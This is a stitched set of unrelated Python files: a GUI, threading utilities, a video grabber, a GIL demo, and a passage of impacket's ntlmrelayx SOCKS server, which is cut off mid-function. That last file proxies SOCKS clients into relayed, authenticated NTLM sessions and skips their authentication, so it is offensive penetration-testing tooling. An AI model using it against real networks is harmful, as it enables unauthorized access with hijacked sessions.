            dev[0].wait_disconnected(timeout=1)
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
|
a_sfVisualize.py | """
Main file that interacts with the user.
"""
import tkinter as tk
from b_viewCube import ViewCube
from c_wifiInterface import *
"""
0 - network_btn
1 - cube_btn
2 - fusedData_btn
3 - rawData_btn
A button is in ON state if the default task it is mapped to is being executed.
"""
# Per-button "task running" flags, indexed as:
# 0 - network_btn, 1 - cube_btn, 2 - fusedData_btn, 3 - rawData_btn
is_btn_on = [False, False, False, False]
# Set to True to stop background watcher loops (see check_cube_closed)
stop_threads = False
# Worker thread instances; re-created after each stop because a Python
# Thread object cannot be restarted.
th_view_cube = ViewCube()
th_recv_data = RecvWifiData()
# This instance sends a PING to the server to
# bypass the blocking s.accept() function and stop the server
th_dummy_client = SendWifiData()
def network_btn_clicked():
    """Toggle the Wi-Fi data receiver thread and update the button label."""
    global th_recv_data
    global th_dummy_client
    if is_btn_on[0]:
        is_btn_on[0] = False
        if th_recv_data.is_alive():
            # Ask the server loop to stop, then connect the dummy client so
            # the blocking accept() returns and the thread can exit.
            th_recv_data.start_server = False
            th_dummy_client.start()
            th_recv_data.join()
            th_dummy_client.join()
        network_btn['text'] = 'Get Data'
        # Threads cannot be restarted; prepare fresh instances for the next
        # toggle.
        th_dummy_client = SendWifiData()
        th_recv_data = RecvWifiData()
    else:
        if not th_recv_data.is_alive():
            th_recv_data.daemon = True
            if is_btn_on[3]:
                # Raw-data display was already requested; carry it over.
                th_recv_data.show_raw_data = True
            th_recv_data.start()
            network_btn['text'] = 'Stop Data'
            is_btn_on[0] = True
def cube_btn_clicked():
    """Toggle the 3-D cube visualization thread and its button label."""
    global th_view_cube
    if not is_btn_on[1]:
        # Currently off: launch the viewer thread.
        if not th_view_cube.is_alive():
            th_view_cube.daemon = True
            th_view_cube.start()
            cube_btn['text'] = 'Close Cube'
            th_view_cube.show_cube = True
            is_btn_on[1] = True
        return
    # Currently on: signal the viewer to close, wait for it, then prepare a
    # fresh instance (a finished Thread cannot be restarted).
    is_btn_on[1] = False
    if th_view_cube.is_alive():
        th_view_cube.show_cube = False
        th_view_cube.join()
    cube_btn['text'] = 'Open Cube'
    th_view_cube = ViewCube()
def fusedData_btn_clicked():
    """Toggle printing of fused data; mutually exclusive with raw output."""
    if is_btn_on[2]:
        # On -> off.
        th_recv_data.th_fusion.show_fused_data = False
        fusedData_btn['text'] = 'Show \nFused Data'
        is_btn_on[2] = False
        return
    # Off -> on.
    fusedData_btn['text'] = 'Hide \nFused Data'
    is_btn_on[2] = True
    th_recv_data.th_fusion.show_fused_data = True
    if is_btn_on[3]:
        # Fused and raw output are mutually exclusive; switch raw off.
        rawData_btn_clicked()
def rawData_btn_clicked():
    """Toggle printing of raw sensor data; mutually exclusive with fused."""
    global th_recv_data
    if is_btn_on[3]:
        # On -> off.
        th_recv_data.show_raw_data = False
        rawData_btn['text'] = 'Show \nRaw Data'
        is_btn_on[3] = False
        return
    # Off -> on.
    th_recv_data.show_raw_data = True
    rawData_btn['text'] = 'Hide \nRaw Data'
    is_btn_on[3] = True
    if is_btn_on[2]:
        # Raw and fused output are mutually exclusive; switch fused off.
        fusedData_btn_clicked()
def check_cube_closed():
    """Watchdog loop: reset cube button state if the cube window is closed
    directly by the user instead of via the button.

    th_view_cube.show_cube is cleared only by cube_btn_clicked(); a dead
    thread whose flag is still set therefore means the window was closed
    from the outside, so cube_btn_clicked() is invoked to clean up.

    Fix: the original loop was a tight busy-wait pinning a CPU core; it now
    polls at a short interval.
    """
    import time  # local import; module top only has GUI/package imports
    while not stop_threads:
        if not th_view_cube.is_alive() and th_view_cube.show_cube:
            print('force close cube')
            cube_btn_clicked()
        time.sleep(0.1)
# initialization
if __name__ == '__main__':
    print('Initializing: Sensor Fusion Visualizer')
    # Setting up the fixed-size main window
    window = tk.Tk()
    window.title("Sensor Fusion Visualizer")
    window.geometry("390x380")
    window.resizable(width=False, height=False)
    # 2x2 grid of equally weighted button cells
    window.columnconfigure([0, 1], weight=1, minsize=100)
    window.rowconfigure([0, 1], weight=1, minsize=100)
    # Setting up components (one toggle button per feature)
    network_btn = tk.Button(master=window, text="Get Data", command=network_btn_clicked)
    network_btn.grid(row=0, column=0, padx=5, pady=5)
    network_btn.config(font=("Calibri", 20))
    cube_btn = tk.Button(master=window, text="Open Cube", command=cube_btn_clicked)
    cube_btn.grid(row=0, column=1, padx=5, pady=5)
    cube_btn.config(font=("Calibri", 20))
    fusedData_btn = tk.Button(master=window, text="Show \nFused Data", command=fusedData_btn_clicked)
    fusedData_btn.grid(row=1, column=0, padx=5, pady=5)
    fusedData_btn.config(font=("Calibri", 20))
    rawData_btn = tk.Button(master=window, text="Show \nRaw Data", command=rawData_btn_clicked)
    rawData_btn.grid(row=1, column=1, padx=5, pady=5)
    rawData_btn.config(font=("Calibri", 20))
    # Watchdog that resets the cube button if the cube window is closed
    # directly (see check_cube_closed)
    th_check_cube = threading.Thread(target=check_cube_closed)
    th_check_cube.daemon = True
    th_check_cube.start()
    # Blocks until the main window is closed
    window.mainloop()
    print('Program ended gracefully.')
|
stream.py | import time
from queue import Queue, Full, Empty
from concurrent.futures import Executor, ThreadPoolExecutor, ProcessPoolExecutor
from concurrent.futures.process import _get_chunks, _process_chunk
from functools import partial
import sys
import contextlib
import threading
import itertools
class StreamExecutor(Executor):
    """Executor mixin providing a streaming, lazily-consuming map().

    Unlike Executor.map(), inputs are pulled from the iterables on a
    background thread and at most ``buffer_size`` submitted futures are
    pending at any time, so infinite or very large inputs can be mapped
    without unbounded memory growth.
    """

    def map(self, fn, *iterables, timeout=None, chunksize=1, buffer_size=10000):
        """Returns an iterator equivalent to map(fn, iter).
        Args:
        fn: A callable that will take as many arguments as there are
        passed iterables.
        timeout: The maximum number of seconds to wait. If None, then there
        is no limit on the wait time.
        chunksize: The size of the chunks the iterable will be broken into
        before being passed to a child process. This argument is only
        used by ProcessPoolExecutor; it is ignored by
        ThreadPoolExecutor.
        buffer_size: The maximum number of input items that may be
        stored at once; default is a small buffer; None for no limit
        (a non-positive value raises ValueError). The
        drawback of using a large buffer is the possibility of wasted
        computation and memory (in case not all input is needed), as
        well as higher peak memory usage.
        Returns:
        An iterator equivalent to: map(func, *iterables) but the calls may
        be evaluated out-of-order.
        Raises:
        TimeoutError: If the entire result iterator could not be generated
        before the given timeout.
        Exception: If fn(*args) raises for any values.
        """
        if not callable(fn):
            raise TypeError('fn argument must be a callable')
        if timeout is None:
            end_time = None
        else:
            end_time = timeout + time.time()
        if buffer_size is None:
            buffer_size = -1  # Queue(maxsize=-1) means unbounded
        elif buffer_size <= 0:
            raise ValueError('buffer_size must be a positive number')
        current_thread = threading.current_thread()
        iterators = [iter(iterable) for iterable in iterables]
        # Deadlocks on the two queues are avoided using the following rule.
        # The writer guarantees to place a sentinel value into the buffer
        # before exiting, and to write nothing after that; the reader
        # guarantees to read the queue until it encounters a sentinel value
        # and to stop reading after that. Any value of type BaseException is
        # treated as a sentinel.
        future_buffer = Queue(maxsize=buffer_size)
        cancel = False

        # This function will run in a separate thread.
        def consume_inputs():
            nonlocal cancel
            while not cancel:
                future = None
                try:
                    args = [next(iterator) for iterator in iterators]
                except BaseException as e:
                    # StopIteration represents exhausted input; any other
                    # exception is due to an error in the input generator. We
                    # forward the exception downstream so it can be raised
                    # when client iterates through the result of map.
                    future = e
                if not future:
                    try:
                        future = self.submit(fn, *args)
                    except BaseException as e:
                        # E.g., RuntimeError from shut down executor.
                        # Forward the new exception downstream.
                        future = e
                while True:
                    try:
                        future_buffer.put(future, timeout=1)
                    except Full:
                        # Periodically re-check for cancellation (or a dead
                        # consumer thread) so a full buffer cannot wedge us.
                        if cancel or not current_thread.is_alive():
                            cancel = True
                            break
                        else:
                            continue
                    if isinstance(future, BaseException):
                        return  # sentinel written; writer must stop here
                    else:
                        break
            # Cancelled: drain the buffer and cancel still-pending futures.
            while True:
                try:
                    future = future_buffer.get(block=False)
                except Empty:
                    return
                if isinstance(future, BaseException):
                    return
                future.cancel()

        # Instances of this class will be created and their methods executed in the main thread.
        class Producer:
            def __next__(self):
                nonlocal cancel
                future = future_buffer.get()
                if isinstance(future, BaseException):
                    # Reraise upstream exceptions at the map call site.
                    # (A StopIteration sentinel ends the iteration here.)
                    raise future
                if end_time is None:
                    remaining_timeout = None
                else:
                    remaining_timeout = end_time - time.time()
                # Any exceptions (errors in the callable fn, TimeOut,
                # GeneratorExit) will be raised at map call site.
                try:
                    return future.result(remaining_timeout)
                except BaseException:
                    cancel = True
                    raise

            def __iter__(self):
                return self

            def __del__(self):
                # Dropping the iterator cancels the background producer.
                nonlocal cancel
                cancel = True

        thread = threading.Thread(target=consume_inputs)
        thread.start()
        return Producer()
class StreamThreadPoolExecutor(StreamExecutor, ThreadPoolExecutor):
    """ThreadPoolExecutor variant that inherits the streaming map()."""
class StreamProcessPoolExecutor(StreamExecutor, ProcessPoolExecutor):
    """ProcessPoolExecutor variant with a streaming map().

    Inputs are grouped into chunks like stdlib ProcessPoolExecutor.map,
    using the private helpers _get_chunks/_process_chunk from
    concurrent.futures.process (an internal API; may change between
    Python versions).
    """

    def map(self, fn, *iterables, timeout=None, chunksize=1, buffer_size=10000):
        # buffer_size counts chunks (not items) downstream, so scale it down.
        if buffer_size is not None:
            buffer_size //= max(1, chunksize)
        if chunksize < 1:
            raise ValueError("chunksize must be >= 1.")
        results = super().map(partial(_process_chunk, fn),
                              _get_chunks(*iterables, chunksize=chunksize),
                              timeout=timeout, buffer_size=buffer_size)
        # Each result is a list of outputs for one chunk; flatten them back
        # into a single stream of results.
        return itertools.chain.from_iterable(results)
|
videostream.py | import os, logging, time
import cv2
from queue import Queue, Full, Empty
import threading
logging.basicConfig(format='%(asctime)s %(levelname)-10s %(message)s', datefmt="%Y-%m-%d-%H-%M-%S",
level=logging.INFO)
class VideoStream:
    """Threaded frame grabber for an OpenCV video source.

    Accepts an RTSP URL, a camera index (as a digit string), or a video file
    name. A background thread samples frames roughly every ``interval``
    seconds and publishes (frame_id, frame) tuples on a bounded queue that
    consumers read via get_frame_with_id().
    """

    default_fps = 30.

    def __init__(self, stream_source, interval=0.5):
        '''
        Parameters:
        stream_source: RTSP, camera index, or video file name
        self.interval: how long to wait before next frame is served (sec)
        '''
        if stream_source == "":
            raise ValueError("stream cannot be empty")
        if interval <= 0 or interval >= 24 * 3600:
            raise ValueError("pulse interval should be positive, shorter than a day")
        # NOTE(review): attribute name has a typo ("listeing") but it is part
        # of the public interface, so it is kept as-is.
        self.keep_listeing_for_frames = True
        # Bounded queue: the producer blocks once 100 frames are unconsumed.
        self.frame_queue = Queue(100)
        self.cam = stream_source
        self.interval = interval
        self.frame_grabber = None
        self.is_rtsp = self.cam.lower().startswith('rtsp')
        # fix if the source is local device like /dev/video0
        if (stream_source.isdigit()):
            self.cam = int(stream_source)
        self.fps = None
        self.delay_frames = None
        self.delay_time = None
        self.video_capture = None

    def stop(self):
        """Signal the grabber thread to stop and wait briefly for it."""
        self.keep_listeing_for_frames = False
        if self.frame_grabber is None:
            return
        try:
            if self.frame_grabber.is_alive():
                # 1 s grace period; the thread is a daemon, so a stuck read
                # does not block process exit.
                self.frame_grabber.join(1)
            self.frame_grabber = None
            logging.info("Stopped grabbing frames")
        except:
            logging.critical("Error while stopping thread")

    def reset(self, stream_source, interval):
        '''
        Any change to stream source or interval will re-set streaming
        '''
        if stream_source == "":
            raise ValueError("stream cannot be empty")
        if interval <= 0 or interval >= 24 * 3600:
            raise ValueError("pulse interval should be positive, shorter than a day")
        self.stop()
        self.cam = stream_source
        self.interval = interval
        self.start()

    def start(self):
        """Start (or restart) the background frame-grabbing thread."""
        if self.frame_grabber is not None:
            self.stop()
        self.keep_listeing_for_frames = True
        self.frame_grabber = threading.Thread(target=self.stream_video)
        self.frame_grabber.daemon = True
        self.frame_grabber.start()
        logging.info(f"Started listening for {self.cam}")

    def get_frame_with_id(self):
        '''
        Retrieves the frame together with its frame id.
        Non-blocking: returns (-1, None) when no frame is ready.
        '''
        try:
            frame_and_id = self.frame_queue.get_nowait()
        except Empty:
            frame_and_id = (-1, None)
        return frame_and_id

    def setup_stream(self):
        """Open the capture and decide between frame-count or wall-clock
        pacing depending on whether the source reports an FPS."""
        self.video_capture = cv2.VideoCapture(self.cam)
        # retrieve camera properties.
        # self.fps may not always be available
        # TODO: Need to support frame counting for RTSP!
        self.fps = self.video_capture.get(cv2.CAP_PROP_FPS)
        if self.fps is not None and self.fps > 0:
            # Serve every Nth frame so output matches the requested interval.
            self.delay_frames = int(round(self.interval * self.fps))
            logging.info(f"Retrieved FPS: {self.fps}")
        else:
            self.delay_time = self.interval

    def stream_video(self):
        """Grabber loop run on the background thread."""
        repeat = 3      # read attempts per iteration before giving up
        wait = 0.1      # seconds between retries
        frame = None
        cur_frame = 0
        # this is used for frame delays if the video is on an infinite loop
        continuous_frame = 0
        # will create a new video capture and determine streaming speed
        self.setup_stream()
        while self.keep_listeing_for_frames:
            start_time = time.time()
            for _ in range(repeat):
                try:
                    res, frame = self.video_capture.read()
                    if not res:
                        # End of stream or dropped source: reopen and reset
                        # the frame counters.
                        self.video_capture = cv2.VideoCapture(self.cam)
                        res, frame = self.video_capture.read()
                        cur_frame = 0
                        continuous_frame = 0
                    break
                except:
                    # try to re-capture the stream
                    logging.info("Could not capture video. Recapturing and retrying...")
                    time.sleep(wait)
            if frame is None:
                # NOTE(review): message says "sending blank image" but nothing
                # is enqueued here -- confirm intended behavior.
                logging.info("Failed to capture frame, sending blank image")
                continue
            # if we don't know how many frames we should be skipping,
            # fall back to wall-clock pacing (non-RTSP sources only)
            if self.delay_frames is None and not self.is_rtsp:
                cur_delay = self.delay_time - time.time() + start_time
                if cur_delay > 0:
                    time.sleep(cur_delay)
            # we are reading from a file, simulate 30 self.fps streaming
            # delay appropriately before enqueueing
            cur_frame += 1
            continuous_frame += 1
            if self.delay_frames is not None and (continuous_frame - 1) % self.delay_frames != 0:
                continue
            # NOTE(review): put() blocks when the queue is full, which can
            # delay shutdown if no consumer is draining the queue.
            self.frame_queue.put((cur_frame, frame))
        self.video_capture.release()
        self.video_capture = None
|
perf.py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# perf.py
# A performance problem with threads
import dis # Disassembler for Python bytecode
import time
import threading
def count(n):
    """Busy-loop n times; pure CPU-bound work used to demonstrate the GIL."""
    remaining = n
    while remaining > 0:
        remaining -= 1
# Show the bytecode of count(); dis.dis() writes to stdout, so the outer
# print() only appends its None return value.
print(dis.dis(count))
# Sequential Execution: run the workload twice back-to-back
start = time.time()
count(10000000)
count(10000000)
end = time.time()
print("Sequential", end-start)
# Threaded execution: same total work split across two threads. The GIL
# prevents CPU-bound bytecode from running in parallel, so this is expected
# to be no faster (see sample timings below).
start = time.time()
t1 = threading.Thread(target=count, args=(10000000,))
t2 = threading.Thread(target=count, args=(10000000,))
t1.start()
t2.start()
t1.join()
t2.join()
end = time.time()
print("Threaded ",end-start)
"""
Sequential 0.951080322265625
Threaded 0.9969501495361328
"""
|
socksserver.py | #!/usr/bin/env python
# Copyright (c) 2013-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SOCKS proxy server/client
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# A simple SOCKS server that proxy connection to relayed connections
#
# ToDo:
# [ ] Handle better the SOCKS specification (RFC1928), e.g. BIND
# [ ] Port handlers should be dynamically subscribed, and coded in another place. This will help coding
# proxies for different protocols (e.g. MSSQL)
import SocketServer
import socket
import time
import logging
from Queue import Queue
from struct import unpack, pack
from threading import Timer, Thread
from impacket import LOG
from impacket.dcerpc.v5.enum import Enum
from impacket.structure import Structure
# Interval, in seconds, between invocations of each socks plugin's keep-alive
# function (see keepAliveTimer). It is up to each plugin whether to actually
# send a keep-alive to the target on every hit; e.g. SMB does not need one
# every 30 seconds.
KEEP_ALIVE_TIMER = 30.0
class enumItems(Enum):
    # SOCKS5 authentication method codes (RFC 1928, section 3)
    NO_AUTHENTICATION = 0
    GSSAPI = 1
    USER_PASS = 2
    UNACCEPTABLE = 0xFF
class replyField(Enum):
    # SOCKS5 REP field values for server replies (RFC 1928, section 6)
    SUCCEEDED = 0
    SOCKS_FAILURE = 1
    NOT_ALLOWED = 2
    NETWORK_UNREACHABLE = 3
    HOST_UNREACHABLE = 4
    CONNECTION_REFUSED = 5
    TTL_EXPIRED = 6
    COMMAND_NOT_SUPPORTED = 7
    ADDRESS_NOT_SUPPORTED = 8
class ATYP(Enum):
    # SOCKS5 address types (RFC 1928, section 5)
    IPv4 = 1
    DOMAINNAME = 3
    IPv6 = 4
class SOCKS5_GREETINGS(Structure):
    # SOCKS5 client greeting: version byte plus offered auth methods
    # (RFC 1928, section 3)
    structure = (
        ('VER','B=5'),
        #('NMETHODS','B=0'),
        ('METHODS','B*B'),
    )
class SOCKS5_GREETINGS_BACK(Structure):
    # Server method-selection answer: METHODS=0 selects "no authentication"
    structure = (
        ('VER','B=5'),
        ('METHODS','B=0'),
    )
class SOCKS5_REQUEST(Structure):
    # SOCKS5 connection request (RFC 1928, section 4); PAYLOAD carries the
    # variable-length destination address followed by the 2-byte port.
    structure = (
        ('VER','B=5'),
        ('CMD','B=0'),
        ('RSV','B=0'),
        ('ATYP','B=0'),
        ('PAYLOAD',':'),
    )
class SOCKS5_REPLY(Structure):
    # SOCKS5 server reply (RFC 1928, section 6); PAYLOAD carries
    # BND.ADDR/BND.PORT. Defaults are placeholders overwritten before
    # sending (see SocksRequestHandler.handle / sendReplyError).
    structure = (
        ('VER','B=5'),
        ('REP','B=5'),
        ('RSV','B=0'),
        ('ATYP','B=1'),
        ('PAYLOAD',':="AAAAA"'),
    )
class SOCKS4_REQUEST(Structure):
    # SOCKS4/4a request: VER CMD DSTPORT DSTIP, then PAYLOAD with the
    # null-terminated user id (and, for SOCKS4a, the hostname).
    # NOTE(review): the ADDR default '4s="' looks truncated -- confirm the
    # intended default against impacket's Structure format syntax.
    structure = (
        ('VER','B=4'),
        ('CMD','B=0'),
        ('PORT','>H=0'),
        ('ADDR','4s="'),
        ('PAYLOAD',':'),
    )
class SOCKS4_REPLY(Structure):
    # SOCKS4 reply; REP=0x5A means "request granted" (0x5B on failure).
    # NOTE(review): two fields share the name 'RSV' (2 + 4 reserved bytes);
    # confirm keyed access to 'RSV' behaves as intended in Structure.
    structure = (
        ('VER','B=0'),
        ('REP','B=0x5A'),
        ('RSV','<H=0'),
        ('RSV','<L=0'),
    )
# Queue where relay servers publish (target, port, userName, client, data)
# tuples for newly available relayed connections; drained by
# activeConnectionsWatcher().
activeConnections = Queue()
# Taken from https://stackoverflow.com/questions/474528/what-is-the-best-way-to-repeatedly-execute-a-function-every-x-seconds-in-python
# Thanks https://stackoverflow.com/users/624066/mestrelion
class RepeatedTimer(object):
    """Invoke *function(*args, **kwargs)* every *interval* seconds.

    Scheduling starts immediately on construction. Drift is avoided by
    deriving each deadline from the previous one (next_call += interval)
    instead of from "now" at re-arm time.
    """

    def __init__(self, interval, function, *args, **kwargs):
        self._timer = None
        self.interval = interval
        self.function = function
        self.args = args
        self.kwargs = kwargs
        self.is_running = False
        self.next_call = time.time()
        self.start()

    def _run(self):
        # Timer fired: re-arm first so callback latency does not delay the
        # next tick, then run the callback.
        self.is_running = False
        self.start()
        self.function(*self.args, **self.kwargs)

    def start(self):
        if self.is_running:
            return
        self.next_call += self.interval
        self._timer = Timer(self.next_call - time.time(), self._run)
        self._timer.start()
        self.is_running = True

    def stop(self):
        self._timer.cancel()
        self.is_running = False
# Base class for Relay Socks Servers for different protocols (SMB, MSSQL, etc)
# Besides using this base class you need to define one global variable when
# writing a plugin for socksplugins:
# PLUGIN_CLASS = "<name of the class for the plugin>"
class SocksRelay:
    """Abstract base for protocol-specific relay SOCKS servers (SMB, MSSQL,
    etc.). Plugin modules must also define a module-level
    PLUGIN_CLASS = "<name of the class for the plugin>".
    """

    PLUGIN_NAME = 'Base Plugin'
    # The plugin scheme, for automatic registration with relay servers.
    # Should be specified in full caps, e.g. LDAP, HTTPS
    PLUGIN_SCHEME = ''

    def __init__(self, targetHost, targetPort, socksSocket, activeRelays):
        self.activeRelays = activeRelays
        self.sessionData = activeRelays['data']
        self.targetHost = targetHost
        self.targetPort = targetPort
        self.socksSocket = socksSocket
        # Filled in by subclasses once the client has been identified.
        self.username = None
        self.clientConnection = None

    def initConnection(self):
        """Prepare the relay for processing incoming connections."""
        raise RuntimeError('Virtual Function')

    def skipAuthentication(self):
        """Bypass any authentication attempt coming from the client."""
        raise RuntimeError('Virtual Function')

    def tunnelConnection(self):
        """Tunnel the remainder of the connection."""
        raise RuntimeError('Virtual Function')

    @staticmethod
    def getProtocolPort(self):
        # NOTE(review): declared @staticmethod yet takes a 'self' parameter;
        # kept as-is since subclasses/callers may rely on the signature.
        raise RuntimeError('Virtual Function')
def keepAliveTimer(server):
    """Periodic callback (every KEEP_ALIVE_TIMER seconds): ask each idle
    relayed connection's protocol client to keep the session alive, and
    prune connections that turn out to be dead. (Python 2 code.)"""
    LOG.debug('KeepAlive Timer reached. Updating connections')
    for target in server.activeRelays.keys():
        for port in server.activeRelays[target].keys():
            # Now cycle through the users
            for user in server.activeRelays[target][port].keys():
                if user != 'data':
                    # Only ping sessions that are not currently tunneling
                    if server.activeRelays[target][port][user]['inUse'] is False:
                        LOG.debug('Calling keepAlive() for %s@%s:%s' % (user, target, port))
                        try:
                            server.activeRelays[target][port][user]['protocolClient'].keepAlive()
                        except Exception, e:
                            LOG.debug('SOCKS: %s' % str(e))
                            if str(e).find('Broken pipe') >= 0 or str(e).find('reset by peer') >= 0 or \
                               str(e).find('Invalid argument') >= 0 or str(e).find('Server not connected') >= 0:
                                # Connection died, taking out of the active list
                                del (server.activeRelays[target][port][user])
                                # Only the shared 'data' entry left: drop the
                                # whole port bucket too.
                                if len(server.activeRelays[target][port].keys()) == 1:
                                    del (server.activeRelays[target][port])
                                LOG.debug('Removing active relay for %s@%s:%s' % (user, target, port))
                    else:
                        LOG.debug('Skipping %s@%s:%s since it\'s being used at the moment' % (user, target, port))
def activeConnectionsWatcher(server):
    """Daemon loop: take newly relayed connections off the global
    activeConnections queue and register them under
    server.activeRelays[target][port][userName]. (Python 2 code.)"""
    while True:
        # This call blocks until there is data, so it doesn't loop endlessly
        target, port, userName, client, data = activeConnections.get()
        # ToDo: Careful. Dicts are not thread safe right?
        if server.activeRelays.has_key(target) is not True:
            server.activeRelays[target] = {}
        if server.activeRelays[target].has_key(port) is not True:
            server.activeRelays[target][port] = {}
        if server.activeRelays[target][port].has_key(userName) is not True:
            LOG.info('SOCKS: Adding %s@%s(%s) to active SOCKS connection. Enjoy' % (userName, target, port))
            server.activeRelays[target][port][userName] = {}
            # This is the protocolClient. Needed because we need to access the killConnection from time to time.
            # Inside this instance, you have the session attribute pointing to the relayed session.
            server.activeRelays[target][port][userName]['protocolClient'] = client
            server.activeRelays[target][port][userName]['inUse'] = False
            server.activeRelays[target][port][userName]['data'] = data
            # Just for the CHALLENGE data, we're storing this general
            server.activeRelays[target][port]['data'] = data
        else:
            # Duplicate credential for the same target/port: keep the first.
            LOG.info('Relay connection for %s at %s(%d) already exists. Discarding' % (userName, target, port))
            client.killConnection()
def webService(server):
    """Minimal Flask status API exposing the currently active SOCKS relays.

    Runs forever on 0.0.0.0:9090 (intended to be launched on its own
    thread).

    Fixed: get_info() was registered on the same rule as get_relays()
    ('/ntlmrelayx/api/v1.0/relays') even though it takes a 'relay' argument,
    so that endpoint could never be invoked successfully; it now has its own
    parameterized rule.
    """
    from flask import Flask, jsonify
    app = Flask(__name__)

    # Silence werkzeug's per-request access logging
    log = logging.getLogger('werkzeug')
    log.setLevel(logging.ERROR)

    @app.route('/')
    def index():
        print(server.activeRelays)
        return "Relays available: %s!" % (len(server.activeRelays))

    @app.route('/ntlmrelayx/api/v1.0/relays', methods=['GET'])
    def get_relays():
        # One row per relayed credential: [scheme, target, user, port]
        relays = []
        for target in server.activeRelays:
            for port in server.activeRelays[target]:
                for user in server.activeRelays[target][port]:
                    if user != 'data':
                        protocol = server.socksPlugins[port].PLUGIN_SCHEME
                        relays.append([protocol, target, user, str(port)])
        return jsonify(relays)

    @app.route('/ntlmrelayx/api/v1.0/relays/<relay>', methods=['GET'])
    def get_info(relay):
        # ToDo: return details for a single relay
        pass

    app.run(host='0.0.0.0', port=9090)
class SocksRequestHandler(SocketServer.BaseRequestHandler):
    def __init__(self, request, client_address, server):
        """Record per-connection state before delegating to the base class
        (BaseRequestHandler.__init__ invokes self.handle() synchronously)."""
        self.__socksServer = server
        self.__ip, self.__port = client_address
        self.__connSocket = request
        # Assume SOCKS5 until the client greeting says otherwise
        self.__socksVersion = 5
        self.targetHost = None
        self.targetPort = None
        self.__NBSession = None
        SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
    def sendReplyError(self, error=replyField.CONNECTION_REFUSED):
        """Send a failure reply matching the negotiated SOCKS version."""
        if self.__socksVersion == 5:
            reply = SOCKS5_REPLY()
            reply['REP'] = error.value
        else:
            reply = SOCKS4_REPLY()
            if error.value != 0:
                # SOCKS4 has a single generic failure code: 0x5B
                reply['REP'] = 0x5B
        return self.__connSocket.sendall(reply.getData())
    def handle(self):
        """Process one SOCKS client: negotiate version, parse the target,
        then hand the socket to the matching relay plugin (or pass DNS
        traffic straight through). (Python 2 code.)"""
        LOG.debug("SOCKS: New Connection from %s(%s)" % (self.__ip, self.__port))
        data = self.__connSocket.recv(8192)
        # Parse only the VER byte out of the greeting to detect the version
        grettings = SOCKS5_GREETINGS_BACK(data)
        self.__socksVersion = grettings['VER']
        if self.__socksVersion == 5:
            # We need to answer back with a no authentication response. We're not dealing with auth for now
            self.__connSocket.sendall(str(SOCKS5_GREETINGS_BACK()))
            data = self.__connSocket.recv(8192)
            request = SOCKS5_REQUEST(data)
        else:
            # We're in version 4, we just received the request
            request = SOCKS4_REQUEST(data)

        # Let's process the request to extract the target to connect.
        # SOCKS5
        if self.__socksVersion == 5:
            if request['ATYP'] == ATYP.IPv4.value:
                self.targetHost = socket.inet_ntoa(request['PAYLOAD'][:4])
                self.targetPort = unpack('>H', request['PAYLOAD'][4:])[0]
            elif request['ATYP'] == ATYP.DOMAINNAME.value:
                # One length octet, then the host name, then the port
                hostLength = unpack('!B', request['PAYLOAD'][0])[0]
                self.targetHost = request['PAYLOAD'][1:hostLength + 1]
                self.targetPort = unpack('>H', request['PAYLOAD'][hostLength + 1:])[0]
            else:
                LOG.error('No support for IPv6 yet!')
        # SOCKS4
        else:
            self.targetPort = request['PORT']
            # SOCKS4a: 0.0.0.x (x != 0) marks a hostname in the payload
            if request['ADDR'][:3] == "\x00\x00\x00" and request['ADDR'][3] != "\x00":
                nullBytePos = request['PAYLOAD'].find("\x00");
                if nullBytePos == -1:
                    LOG.error('Error while reading SOCKS4a header!')
                else:
                    # Hostname follows the null-terminated user id
                    self.targetHost = request['PAYLOAD'].split('\0', 1)[1][:-1]
            else:
                self.targetHost = socket.inet_ntoa(request['ADDR'])

        LOG.debug('SOCKS: Target is %s(%s)' % (self.targetHost, self.targetPort))
        if self.targetPort != 53:
            # Do we have an active connection for the target host/port asked?
            # Still don't know the username, but it's a start
            if self.__socksServer.activeRelays.has_key(self.targetHost):
                if self.__socksServer.activeRelays[self.targetHost].has_key(self.targetPort) is not True:
                    LOG.error('SOCKS: Don\'t have a relay for %s(%s)' % (self.targetHost, self.targetPort))
                    self.sendReplyError(replyField.CONNECTION_REFUSED)
                    return
            else:
                LOG.error('SOCKS: Don\'t have a relay for %s(%s)' % (self.targetHost, self.targetPort))
                self.sendReplyError(replyField.CONNECTION_REFUSED)
                return

        # Now let's get into the loops
        if self.targetPort == 53:
            # Somebody wanting a DNS request. Should we handle this?
            s = socket.socket()
            try:
                LOG.debug('SOCKS: Connecting to %s(%s)' % (self.targetHost, self.targetPort))
                s.connect((self.targetHost, self.targetPort))
            except Exception, e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback
                    traceback.print_exc()
                LOG.error('SOCKS: %s' % str(e))
                self.sendReplyError(replyField.CONNECTION_REFUSED)
                return
            if self.__socksVersion == 5:
                reply = SOCKS5_REPLY()
                reply['REP'] = replyField.SUCCEEDED.value
                addr, port = s.getsockname()
                reply['PAYLOAD'] = socket.inet_aton(addr) + pack('>H', port)
            else:
                reply = SOCKS4_REPLY()
            self.__connSocket.sendall(reply.getData())
            # Plain request/response forwarding loop for DNS-over-TCP
            while True:
                try:
                    data = self.__connSocket.recv(8192)
                    if data == '':
                        break
                    s.sendall(data)
                    data = s.recv(8192)
                    self.__connSocket.sendall(data)
                except Exception, e:
                    if logging.getLogger().level == logging.DEBUG:
                        import traceback
                        traceback.print_exc()
                    # NOTE(review): the extra positional arg to LOG.error has
                    # no matching placeholder, and the loop keeps running
                    # after an error -- confirm intended behavior.
                    LOG.error('SOCKS: ', str(e))

        if self.__socksServer.socksPlugins.has_key(self.targetPort):
            LOG.debug('Handler for port %s found %s' % (self.targetPort, self.__socksServer.socksPlugins[self.targetPort]))
            relay = self.__socksServer.socksPlugins[self.targetPort](self.targetHost, self.targetPort, self.__connSocket,
                                                                     self.__socksServer.activeRelays[self.targetHost][self.targetPort])
            try:
                relay.initConnection()
                # Let's answer back saying we've got the connection. Data is fake
                if self.__socksVersion == 5:
                    reply = SOCKS5_REPLY()
                    reply['REP'] = replyField.SUCCEEDED.value
                    addr, port = self.__connSocket.getsockname()
                    reply['PAYLOAD'] = socket.inet_aton(addr) + pack('>H', port)
                else:
                    reply = SOCKS4_REPLY()
                self.__connSocket.sendall(reply.getData())
                if relay.skipAuthentication() is not True:
                    # Something didn't go right
                    # Close the socket
